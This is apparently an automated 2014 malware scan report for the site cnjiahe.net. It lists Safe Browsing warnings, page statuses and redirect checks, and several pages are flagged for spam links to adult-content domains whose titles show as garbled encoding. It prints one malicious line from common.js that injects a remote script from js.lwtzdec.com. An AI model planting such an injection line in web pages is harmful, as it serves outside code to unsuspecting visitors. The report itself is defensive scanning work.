Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cnjiahe.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://cnjiahe.net/ | HTTP/1.1 200 OK Date: Sat, 06 Sep 2014 20:25:56 GMT Accept-Ranges: bytes ETag: "6856bd1cacf1:949a" Server: Microsoft-IIS/6.0 Content-Length: 17046 Content-Location: http://cnjiahe.net/index.html Content-Type: text/html Last-Modified: Sat, 06 Sep 2014 18:38:23 GMT X-Powered-By: ASP.NET | clean |
http://cnjiahe.net/index.html | 200 OK Content-Length: 17046 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: rthwer.com ...[2942 bytes skipped]... /li> </UL> </DIV> <DIV class="global_module margin_bot10 bg_fff"> <DIV class=global_module2_caption> <H3>ÓÑÇéÁ¬½Ó</H3> </DIV> <UL class=global_tx_list3> <li class="no1"><a href="http://sdfgso.com" title="ÔÚÏß¿´ÈÕ±¾avµçÓ°">ÔÚÏß¿´ÈÕ±¾avµçÓ°</a></li> <li class="no1"><a href="http://rthwer.com" title="ÑÇÖÝÅ®ÓÅ">ÑÇÖÝÅ®ÓÅ</a></li> <li class="no1"><a href="http://biantsf.net" title="999³ÉÈËСÓÎÏ·">999³ÉÈËСÓÎÏ·</a></li> <li class="no1"><a href="http://ruiklcb.com" title="ÑÇÖÞÉ«¸ç¸çͼ¿â">ÑÇÖÞÉ«¸ç¸çͼ¿â</a></li> <li class="no1"><a href="http://tigui.com.cn" title="¹ú²úÈËÌåÉ«Çé ͼƬÍøÖ·">¹ú²úÈËÌåÉ«Çé ͼƬÍøÖ·</a></li> <li class="no1"><a href="http://duowavil.com" t ...[1199 bytes skipped]... | ||
http://cnjiahe.net/common.js | 200 OK Content-Length: 96 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: js.lwtzdec.com document.writeln("<SCRIPT language=javascript src=\"http://js.lwtzdec.com/zy.js\"></SCRIPT>");
Decoded script: <SCRIPT language=javascript src="http://js.lwtzdec.com/zy.js"></SCRIPT> | ||
http://cnjiahe.net/tj.js | 200 OK Content-Length: 122 Content-Type: application/x-javascript | clean |
http://cnjiahe.net/djravmnyzst/ | HTTP/1.1 200 OK Date: Sat, 06 Sep 2014 20:25:59 GMT Accept-Ranges: bytes ETag: "a4f623bd1cacf1:949a" Server: Microsoft-IIS/6.0 Content-Length: 12314 Content-Location: http://cnjiahe.net/djravmnyzst/index.html Content-Type: text/html Last-Modified: Sat, 06 Sep 2014 18:38:23 GMT X-Powered-By: ASP.NET | clean |
http://cnjiahe.net/djravmnyzst/index.html | 200 OK Content-Length: 12314 Content-Type: text/html | clean |
http://cnjiahe.net/hswzynx/ | HTTP/1.1 200 OK Date: Sat, 06 Sep 2014 20:26:01 GMT Accept-Ranges: bytes ETag: "c802dbd1cacf1:949a" Server: Microsoft-IIS/6.0 Content-Length: 12148 Content-Location: http://cnjiahe.net/hswzynx/index.html Content-Type: text/html Last-Modified: Sat, 06 Sep 2014 18:38:23 GMT X-Powered-By: ASP.NET | clean |
http://cnjiahe.net/hswzynx/index.html | 200 OK Content-Length: 12148 Content-Type: text/html | clean |
http://cnjiahe.net/crsqtp/ | HTTP/1.1 200 OK Date: Sat, 06 Sep 2014 20:26:02 GMT Accept-Ranges: bytes ETag: "74937bd1cacf1:949a" Server: Microsoft-IIS/6.0 Content-Length: 12071 Content-Location: http://cnjiahe.net/crsqtp/index.html Content-Type: text/html Last-Modified: Sat, 06 Sep 2014 18:38:23 GMT X-Powered-By: ASP.NET | clean |
http://cnjiahe.net/crsqtp/index.html | 200 OK Content-Length: 12071 Content-Type: text/html | clean |
http://cnjiahe.net/crsqtp/70720140907.html | 200 OK Content-Length: 18528 Content-Type: text/html | clean |
http://cnjiahe.net/hswzynx/79420140823.html | 200 OK Content-Length: 18844 Content-Type: text/html | clean |
http://cnjiahe.net/djravmnyzst/93620140823.html | 200 OK Content-Length: 20243 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: gzktmh.com <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <title>ËäÈ»¶¼ÊÇÃÀÈ˦اѧ⣮¨ç§Ò¦ª£®§³£î¶íÂÞ˹·ÊÆÅÐÄÇéÔËÆø_ÄÜ¿´ÑÇÖÞɫͼµÄÍøÕ¾_¸çҲɫ¾µäÈý¼¶¡¾2014È«¼¯¡¿</title> <meta name="keywords" content="¶íÂÞ˹·ÊÆÅ"/> <meta name="description" content="¶íÂÞ˹·ÊÆÅΪÄãÌṩ¶íÂÞ˹·ÊÆźͶíÂÞ ...[4555 bytes skipped]... | ||
http://cnjiahe.net/crsqtp/6420140823.html | 200 OK Content-Length: 18174 Content-Type: text/html | clean |
http://cnjiahe.net/djravmnyzst/3520140823.html | 200 OK Content-Length: 19627 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ayjinpeng.com <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <title>ÖªµÀ¾¯²ìÖØÇ커ʿÃÅqvodÅÆ×Ó_ÄÜ¿´ÑÇÖÞɫͼµÄÍøÕ¾_¸çҲɫ¾µäÈý¼¶¡¾2014È«¼¯¡¿</title> <meta name="keywords" content="ÖØÇ커ʿÃÅqvod"/> <meta name="description" content="ÖØÇ커ʿÃÅqvodΪÄãÌṩÖØÇ커ʿÃÅqvodºÍÖØÇ커ʿÃÅqvodµÄÄ ...[4557 bytes skipped]... | ||
http://cnjiahe.net/hswzynx/96920140823.html | 200 OK Content-Length: 20152 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: vibesseo.com <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <title>¶ÔÊÖÒ»Ñ۱뺷ÆðµãÈËÌåÒÕÊõÈôÊDz»_ÄÜ¿´ÑÇÖÞɫͼµÄÍøÕ¾_¸çҲɫ¾µäÈý¼¶¡¾2014È«¼¯¡¿</title> <meta name="keywords" content="ÆðµãÈËÌåÒÕÊõ"/> <meta name="description" content="ÆðµãÈËÌåÒÕÊõΪÄãÌṩÆðµãÈËÌåÒÕÊõºÍÆðµãÈËÌåÒÕÊõµÄÄÚÈÝ, ...[4582 bytes skipped]... | ||
http://cnjiahe.net/crsqtp/58920140907.html | 200 OK Content-Length: 18342 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: yynhjx.com <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <title>ÒòΪÕÅÑôÊé°üÍøÀ±ÎÄÔÚÏßÄã°ìºÃÊÖ»ú°µµÀ_ÄÜ¿´ÑÇÖÞɫͼµÄÍøÕ¾_¸çҲɫ¾µäÈý¼¶¡¾2014È«¼¯¡¿</title> <meta name="keywords" content="Êé°üÍøÀ±ÎÄÔÚÏß"/> <meta name="description" content="Êé°üÍøÀ±ÎÄÔÚÏßΪÄãÌṩÊé°üÍøÀ±ÎÄÔÚÏߺÍÊé°üÍø ...[4599 bytes skipped]... | ||
http://cnjiahe.net/crsqtp/0420140907.html | 200 OK Content-Length: 18548 Content-Type: text/html | clean |
http://cnjiahe.net/hswzynx/67320140907.html | 200 OK Content-Length: 19057 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cnjiahe.net
Result:
HTTP/1.1 200 OK
Date: Sat, 06 Sep 2014 20:25:56 GMT
Accept-Ranges: bytes
ETag: "6856bd1cacf1:949a"
Server: Microsoft-IIS/6.0
Content-Length: 17046
Content-Location: http://cnjiahe.net/index.html
Content-Type: text/html
Last-Modified: Sat, 06 Sep 2014 18:38:23 GMT
X-Powered-By: ASP.NET
...17046 bytes of data.
GET / HTTP/1.1
Host: cnjiahe.net
Result:
HTTP/1.1 200 OK
Date: Sat, 06 Sep 2014 20:25:56 GMT
Accept-Ranges: bytes
ETag: "6856bd1cacf1:949a"
Server: Microsoft-IIS/6.0
Content-Length: 17046
Content-Location: http://cnjiahe.net/index.html
Content-Type: text/html
Last-Modified: Sat, 06 Sep 2014 18:38:23 GMT
X-Powered-By: ASP.NET
...17046 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cnjiahe.net
Referer: http://www.google.com/search?q=cnjiahe.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cnjiahe.net
Referer: http://www.google.com/search?q=cnjiahe.net
Result:
The result is similar to the first query. There are no suspicious redirects found.